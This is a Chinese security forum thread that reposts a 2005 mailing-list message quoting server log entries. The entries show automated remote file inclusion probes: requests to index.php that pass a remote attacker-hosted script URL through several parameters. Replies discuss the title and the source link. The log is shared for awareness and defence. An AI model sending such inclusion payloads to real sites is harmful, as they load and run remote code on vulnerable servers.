发新话题
打印

[转载]PHP Command and Safemode

[转载]PHP Command and Safemode

信息来源:邪恶八进制信息安全团队(www.eviloctal.com

looks like CSE exploit is circulating again...
found several queries today from server log
anyone confirms?

"GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?id=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035
"-" "Python-urllib/2.4"
"GET /index.php?action=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?include=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"
"GET /index.php?site=http://213.202.214.198/cse.gif? HTTP/1.1" 404
1035 "-" "Python-urllib/2.4"

this url is hot and working right now so handle with care...
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

问个问题.这个标题好象和文章内容不相符啊..文章是一个用python脚本利用的一个php文件include漏洞的web log文件.和safemode有什么关系?
http://www.phpweblog.net/GaRY/

TOP

他的原来题目是PHP Command/Safemode Exploit
我觉得8大合适 所以把exp那几个字去掉了...
原始连接如下:
http://seclists.org/lists/fulldisclosure/2005/Jul/0650.html
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

发新话题